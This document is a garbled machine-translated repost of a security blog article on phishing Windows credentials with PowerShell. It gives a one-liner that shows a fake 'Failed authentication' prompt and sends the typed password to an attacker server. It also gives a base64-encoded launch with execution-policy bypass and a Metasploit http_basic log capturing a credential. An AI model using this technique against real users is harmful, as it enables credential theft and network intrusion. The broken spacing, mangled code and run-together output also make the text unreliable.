Enable basic certification phishing with PowerShell get password

This article from https://www.secpulse.com/archives/4131.html

$cred=$host. ui.promptforcredential (' Failed authentication ', ', [Environment]::userdomainname +"\"+ [Environment]::username,[environment]::userdomainname]; [System.net.servicepointmanager]::servercertificatevalidationcallback = {$true};$WC= new-object net.webclient;$WC. Headers.add ("user-agent","wget/1.9+cvs-stable (Red Hat modified)");$WC. Proxy = [System.Net.WebRequest]::Defaultwebproxy;$WC. Proxy.credentials = [System.Net.CredentialCache]::defaultnetworkcredentials;$WC. Credentials = New-object System.Net.NetworkCredential ($cred. Username,$cred. getnetworkcredential (). password, ');$result=$WC. downloadstring (' https://172.16.102.163 ');

Break it down:

$cred $host. ui.promptforcredential (' Failed authentication ', ', [environment]::username,[environment]:: UserDomainName);

This step tells Windows prompt voucher, we set the title is "Failed Authentication" (verification failure), in the popup window added user name and domain name to mention the authenticity. Of course, all this is only auxiliary.

[System.net.servicepointmanager]::servercertificatevalidationcallback = {$true};

Tell PowerShell not to validate the SSL certificate (allowing us to use the self-signed certificate later)

$WC = new-object net.webclient; $WC. Headers.add ("user-agent","wget/1.9+cvs-stable" (Red Hat modified)  ");

Create a new WebClient object and set its user agent to wget.

$WC. Proxy = [System.Net.WebRequest]::defaultwebproxy; $WC. Proxy.credentials = [System.Net.CredentialCache]::D efaultnetworkcredentials;

Tells PowerShell to use any proxy and any cached credentials that the current user may be using.

$WC. Credentials = New-object system.net.networkcredential ($cred$cred. Getnetworkcredential (). password, ');

The password that the user entered in this Basic authentication phishing is the password that security researchers and hackers want, which is very beneficial to internal network infiltration.

$result $WC. downloadstring (' https://172.16.102.163 ');

Finally send a request to the listening machine on the listening machine using the Metasploit capture module

Cat Power.txt | Iconv--to-code Utf-16le | Base64

Jabjahiazqbkacaapqagacqaaabvahmadaauahuaaqauahaacgbvag0acab0agyabwbyagmacgblagqazqbuahqaaqbhagwakaanaeyayqbpagwazqbkacaaq Qb1ahqaaablag4adabpagmayqb0agkabwbuaccalaanaccalabbaeuabgb2agkacgbvag4abqblag4adabdadoaogbvahmazqbyaeqabwbtageaaqbuae4ayq Btaguaiaaracaaigbcaciaiaaracaawwbfag4adgbpahiabwbuag0azqbuahqaxqa6adoavqbzaguacgboageabqblacwawwbfag4adgbpahiabwbuag0azqb Uahqaxqa6adoavqbzaguacgbeag8abqbhagkabgboageabqblackaowakafsauwb5ahmadablag0algboaguadaauafmazqbyahyaaqbjaguauabvagkabgb0 Ae0ayqbuageazwblahiaxqa6adoauwblahiadgblahiaqwblahiadabpagyaaqbjageadablafyayqbsagkazabhahqaaqbvag4aqwbhagwababiageaywbra Caapqagahsajab0ahiadqblah0aowakacqadwbjacaapqagag4azqb3ac0abwbiagoazqbjahqaiabuaguadaauahcazqbiagmababpaguabgb0adsacgakah Caywauaegazqbhagqazqbyahmalgbbagqazaaoaciavqbzaguacgataeeazwblag4adaaiacwaigbxagcazqb0ac8amqauadkakwbjahyacwatahmadabhagi abablacaakabsaguazaagaegayqb0acaabqbvagqaaqbmagkazqbkackaigapadsacgakahcaywauafaacgbvahgaeqagad0aiabbafmaeqbzahqazqbtac4a Tgblahqalgbxaguaygbsaguacqb1aguaCwb0af0aoga6aeqazqbmageadqbsahqavwblagiauabyag8aeab5adsacgakahcaywauafaacgbvahgaeqauaemacgblagqazqbuahqaaqbhagwacwagad0ai Abbafmaeqbzahqazqbtac4atgblahqalgbdahiazqbkaguabgb0agkayqbsaemayqbjaggazqbdadoaogbeaguazgbhahuabab0ae4azqb0ahcabwbyagsaqw Byaguazablag4adabpageababzadsacgakahcaywauagmacgblagqazqbuahqaaqbhagwacwagad0aiabuaguadwatag8aygbqaguaywb0acaacwb5ahmadab Lag0algbuaguadaauag4azqb0ahcabwbyagsaywbyaguazablag4adabpageabaaoacqaywbyaguazaauahuacwblahiabgbhag0azqasacaajabjahiazqbk Ac4azwblahqabgblahqadwbvahiaawbjahiazqbkaguabgb0agkayqbsacgakqauahaayqbzahmadwbvahiazaasacaajwanackaowakacqacgblahmadqbsa Hqaiaa9acaajab3agmalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaanaggadab0ahaacwa6ac8alwaxadcamgauadeangauadeamaayac4amqa2ad Majwapadsacga=

Base64 the above code

Then powershell -ep bypass -enc <上述加密代码> you can see the very realistic Basic authentication fishing window:

On the other side, use Metasploit to receive the password:

[Email Protected]:~/metasploit-framework#./MSFCONSOLE-LQMSF > Use auxiliary/server/capture/http_basic MSF Auxiliary (http_basic)>Show Optionsmodule Options (Auxiliary/server/capture/http_basic): Name current Setting Required Description----         ---------------  --------  -----------Realm Secure Site yes the authentication realm you ' d as to present. RedirectURL no the page to redirect users to after they enter basic auth creds srvhost 0.0.0.0 Yes the local host to listen on. This must is an address on the local machine or 0.0.0.0Srvport80Yes the local port to listen on. SSLfalseNo Negotiate SSL forIncoming Connections Sslcert no Path to a custom SSL certificate (defaultis randomly generated) Sslversion SSL3 No Specify the version of SSL/should be used (ACCEPTED:SSL2, SSL3, TLS1) Urip ATH no the URI to use forThis exploit (defaultis Random) MSF auxiliary (http_basic)> Set SSLtrueSSL=trueMSF Auxiliary (http_basic)> Set Srvport 443Srvport= 443MSF Auxiliary (http_basic)> Set Uripath/Uripath=/MSF Auxiliary (http_basic)>run[*] Auxiliary Module Execution COMPLETEDMSF Auxiliary (http_basic)> [*] Listening on 0.0.0.0:443... [*] Using url:https://0.0.0.0:443/[*] Local ip:https://172.16.102.163:443/[*] Server started. [*] 172.16.102.140 http_basic-sending 401 to client 172.16.102.140[+] 172.16.102.140-credential collected:"sittingduck\user:asdqwe123"=/

Enable basic certification phishing with PowerShell get password